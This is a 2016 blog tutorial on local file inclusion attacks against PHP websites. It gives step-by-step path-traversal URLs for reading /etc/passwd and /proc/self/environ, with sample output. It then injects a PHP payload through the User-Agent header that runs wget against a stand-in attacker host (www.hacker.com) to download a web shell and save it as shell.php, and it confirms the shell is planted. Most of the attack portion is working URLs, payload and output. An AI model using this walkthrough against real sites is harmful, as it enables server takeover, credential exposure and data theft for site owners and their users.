Amir Roknifard
Amir Roknifard is a cyber security professional with years of professional experience and proven track record in cyber security management and risk consulting, helping boards to better manage their cyber risk and transform their cyber security practices. He is the founder of Academician Journal that aims to close the gap between academy and InfoSec industry. He also has authored and reviewed books, published articles, and developed a master's degree program in cyber security.
Cybersecurity / Tutorials

File Inclusion Attack

May 7, 2016

A file inclusion is a vulnerability which allows an attacker to access unauthorised file on web server and can execute the malicious code by using ‘include’ functional vulnerability. The local file inclusion LFI is a process of Including Local File available on webserver. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitised then an attacker give the some default files location and access all these sensitives files.

Lets suppose this website is vulnerable to local file inclusion attack:

www.roknifard.com/view.php?page=contact.php

Now lets replace contact.php with ../ and try the new URL:

www.roknifard.com/view.php?page=../|

Now after requesting this page we got an error. There is a big chance to have a Local File Inclusion vulnerability.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/roknifard/public_html/roknifard.com/view.php on
line 1337

Now lets check for etc/passwd to see the if Local File Inclusion is vulnerable:

www.roknifard.com/view.php?page=../../../etc/passwd

we got an error and now we include more directories to look for etc/passwd file

www.roknifard.com/view.php?page=../../../../../etc/passwd

If you will get a page like the following, that means you have successfully Included a /etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin 
operator:x:11:0:operator:/root:/sbin/nologin 
games:x:12:100:games:/usr/games:/sbin/nologin 
test:x:13:30:test:/var/test:/sbin/nologin 
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 
nobody:x:99:99:Nobody:/:/sbin/nologin

We successfully included a file and our next step is to include a proc/self/environ file. So now replace /etc/passwd with /proc/self/environ file.

www.roknifard.com/view.php?page=../../../../../proc/self/environ

If you get something like the following, that means you have successfully included a proc/self/environ file.

DOCUMENT_ROOT=/home/roknifard/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.roknifard.com
HTTP_REFERER=http://www.roknifard.com/index.php?view=../../../../../../etc/passwd 
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 
PATH=/bin:/usr/bin 
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron 
REDIRECT_STATUS=200 
REMOTE_ADDR=6x.1xx.4x.1xx 
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenvir
on SCRIPT_FILENAME=/home/roknifard/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@roknifard.com
SERVER_NAME=www.roknifard.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at
www.roknifard.com Port 80

proc/self/environ is accessible. If you got a blank page or an error, that means proc/self/environ is not accessible or the OS is a FreeBSD.

Now let’s inject our malicious code in proc/self/environ. We can inject our code in User-Agent HTTP Header. Use Tamper Data Add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

www.roknifard.com/view.php?page=../../../../../proc/self/environ

Now Tamper this page and in user agent add you uploader script and then submit. You will get an uploader on /proc/self/environ page, just browse and upload your shell.

You can also upload your shell by downloading remotely using wget command.

<?system('wget www.hacker.com/shell.txt -O shell.php');?>

Add this command in user agent and request the page. Now our command is successfully executed and will download the .txt shell from www.hacker.com/shell.txt and save it as shell.php in the website directory. through system(), and our shell will be created. If didn’t work, try exec() because system() can be disabled on the webserver from php.ini.

Now lets check if our malicious code, if it was successfully injected. Lets check if the shell is present.

www.roknifard.com/shell.php

Our shell is there. Injection was successful.

Share